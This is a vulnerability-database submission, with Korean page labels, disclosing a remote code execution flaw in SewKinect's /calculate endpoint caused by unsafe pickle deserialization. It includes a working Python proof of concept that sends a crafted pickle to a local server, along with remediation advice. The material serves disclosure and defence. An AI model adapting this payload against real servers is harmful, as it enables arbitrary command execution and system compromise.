제출 #653270: SewKinect latest OS Command Injection정보

제목	SewKinect latest OS Command Injection
설명	# Remote Code Execution Vulnerability in /calculate Endpoint ### Summary The `/calculate` endpoint in the application is vulnerable to Remote Code Execution (RCE) due to unsafe deserialization using Python's `pickle.loads` on user-supplied data. ### Details - The endpoint accepts POST requests with form fields `body_parts` and `point_cloud`. - These fields are base64-encoded pickled objects, which are decoded and deserialized using `pickle.loads` without validation. - Python's `pickle` module is inherently unsafe for deserializing untrusted data, as it can execute arbitrary code during the loading process. - An attacker can craft a malicious pickle payload to execute arbitrary system commands on the server. ## PoC - Run Server ```shell python app.py ``` - Run poc.py ```Python import pickle import base64 import requests class Payload(object): def __reduce__(self): import os return (os.system, ('echo "PWNED"',)) def poc(): payload = pickle.dumps(Payload()) resp = requests.post( "http://127.0.0.1:5000/calculate", headers={"Content-type": "application/x-www-form-urlencoded"}, data={ "body_parts": base64.b64encode(payload).decode(), "point_cloud": base64.b64encode(pickle.dumps(None)).decode() } ) print(resp.status_code, resp.text) if __name__ == "__main__": poc() ``` ### Impact Successful exploitation allows attackers to execute arbitrary code on the server, potentially leading to full system compromise, data theft, or service disruption. ### Recommendation - Never use `pickle.loads` on data from untrusted sources. - Replace pickle with a safe serialization format such as JSON. - Validate and sanitize all user inputs. ### References - [Python pickle documentation (Security Considerations)](https://docs.python.org/3/library/pickle.html#security-concerns) - [OWASP: Deserialization of Untrusted Data](https://owasp.org/www-community/vulnerabilities/Deserialization_of_untrusted_data)
원천	⚠️ https://github.com/giantspatula/SewKinect/issues/3
사용자	zznQ (UID 64000)
제출	2025. 09. 12. AM 07:19 (7 개월 ago)
모더레이션	2025. 09. 25. PM 04:10 (13 days later)
상태	수락
VulDB 항목	325845 [giantspatula SewKinect 까지 7fd963ceb3385af3706af02b8a128a13399dffb1 Endpoint /calculate pickle.loads body_parts/point_cloud 권한 상승]
포인트들	20

◂ 이전 개요 다음 ▸

Want to know what is going to be exploited?

We predict KEV entries!